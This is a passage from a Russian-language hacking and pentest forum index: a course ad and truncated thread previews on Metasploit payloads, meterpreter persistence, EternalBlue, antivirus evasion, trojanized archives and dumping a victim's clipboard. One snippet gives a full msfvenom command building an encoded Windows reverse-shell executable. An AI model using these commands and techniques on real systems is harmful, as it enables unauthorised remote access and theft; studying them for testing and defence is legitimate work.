🔍 Изучите методы разведки с использованием открытых источников (OSINT) для проведения успешных атак.
🛠️ Освойте ключевые инструменты, такие как Maltego, TheHarvester и другие.
🧪 Пройдите практические лабораторные работы, имитирующие реальную разведку.
🧠 Развивайте навыки, которые помогут вам стать экспертом в области информационной безопасности.
Здравствуйте, в инете очень много способов создать фуд пейлоад (метасплоит) запустить его тоже не большая проблема, только вот допустим меня нету дома и метерпретер конектится, но не может подконектиться так как комп выключен, как я знаю сессия умрет через 15 минут да? Что мне сделать чтоб...
Друзья, подскажите, думаю многим пригодится
В инете что не сервер, то новая инструкция, + разные оболочки с настойками
Посоветуйте, как не напороть косяков!
Грамотно установить оболочку, не инсталируя лишнего, что б не вызвать конфликтов.
И главное как им (сервером) управлять в графическом...
Доброго время суток. Нуждаюсь в помощи людей который знакомы с metasploit.Проблема такая, я генерирую пейлоад (
msfvenom -a x64 --platform windows -p windows/x64/shell/reverse_tcp LHOST=172.16.104.130 LPORT=443 -b "\x00" -e x64/shikata_ga_nai -f exe -o /tmp/1.exe
), закидаю файл на машину...
В локалке имеется машинка Win7 SP1 x86 (192.168.1.106)
И Kali linux (192.168.1.103) на которую установлен Metasploit-Framework с добавленным модулем exploit/windows/smb/eternalblue_doublepulsar.
Сканирую виндовую машину с помощью auxiliary/scaner/smb/smb_ms17_010:
Делаю вывод, что машинка...
Вопрос: Как сделать так что бы сессия была многократная и я мог прослушивать каждый раз один и тот же ПК. На сколько я знаю как-то можно это дело прописать в реестр и автозапуск только как ?
Вот так на сколько я понимаю пишется сам пейлоад для получения сессии meterpreter, но он одноразовый...
Добрый день. Получил сессию meterpreter, и у меня сразу же открылся командный шелл (cmd). После этого не удается перейти на стандартный шелл meterpreter. Как быть?
You must be registered for see element.
Есть еще вопрос: после того как получил сессию, и случайно закрыл терминал, то всё...
Здрасте. Сталкивался кто с подобным?
На целевой машине есть сессия "meterpreter" и создан пользователь с правами администратора.
Когда пытаюсь подключиться к цели как к дедику, через "RDP". То подключаюсь до того момента, когда вижу строки для входа в машину "windows" с взятыми из "RDP" клиента...
Доброго времени суток Господа. Я здесь, на форуме новичок, да и в linux тоже... и до поры до времени не хотел нудить глупыми вопросами, но видимо придется, поскольку ответа не могу найти. Есть сессия meterpreter'a и все происходит отлично кроме одного - не открываются директории имеющие в...
И так создал пейлод, закинул на виртуалку и вроде все срабатывает но /multi/handler не меняется на meterpreter, да и сам пейлод выдает ошибку, хотя сессия вроде как создалась. В общем реквестирую норм гайдов по этой теме, а то все что я нашел в сети какое то обрывочное да и устарело на пару лет...
You must be registered for see element.
Добрый вечер , Друзья , Уважаемые Форумчане и Гости форума.
Несколько необычное будет сегодня описание инструмента , с которым вас хочу познакомить.
Автором его является N00py . Это человек , который увлекается пентестом.
Hwacha была в очень далёкие...
С первым днём весны! Сегодня покажу как закрепиться в системе андроид. Скрипт будет работать до перезагрузки!. Наверняка у всех такое было, когда умирает сессия при пропадании соединения, и нет возможности запустить её снова, и успеть сделать все дела.
Нам необходимо создать полезную нагрузку...
Всем привет!
Проблема следующая: на уязвимой машине поднимаю шелл ( windows/shell/bind_tcp). При попытке подключения метасплоит повисает в неопределенном состоянии и не даёт делать никаких действий кроме как выйти из сессии (ctr+c). Повысить сессию до meterpreter тоже завершается неудачей.
В...
Отказ от ответственности: Эта статья написана только для образовательных целей. Автор или издатель не публиковали эту статью для вредоносных целей. Если читатели хотели бы загрузить эту программу, чтобы использовать её для личной выгоды, то автор и издатель не должны нести ответственность за...
Снова здравствуйте! В этой статье, я хотел бы проверить на практике инструмент, который может объединить два файла (полезную нагрузку и легитимный файл) в SFX – архив, при открытии которого, мы получим активную meterpreter сессию на атакующем хосте.
Итак, имя ему Trojanizer:
You must be...
Всем привет! Сегодня столкнулся с такой ситуаций, когда нужно взять информацию из буфера обмена Victim. Разобрался и решил создать лайтовую статью для вас, думаю каждому пригодится в арсенале такая фича! Проводить атаку мы будем в kali linux 2017.3, а атаковать будем многострадальный windows...
OneDollar
Тема
clipboard
dump
dump буфера обмена
empire
meterpreter
onedollar
получить информацию из буфера обмена
Вопрос от новичка - после удачного использования эксплоита я получаю meterpreter-сессию. Возможно ли использовать вместо MP payload, например, скачивание и запуск exe файла? Например с CVE-2017-11882? Если да, то как это реализуется?
И снова Hello! Сегодня я хочу представить Вам удобный инструмент под названием Phantom-evasion.
Что он из себя представляет ? Phantom-evasion - это удобный и простой в использовании инструмент для генерации полезной нагрузки, написан на Python, совместим с версиями python 2.7 and 3.4 и выше...
На данном сайте используются cookie-файлы, чтобы персонализировать контент и сохранить Ваш вход в систему, если Вы зарегистрируетесь.
Продолжая использовать этот сайт, Вы соглашаетесь на использование наших cookie-файлов.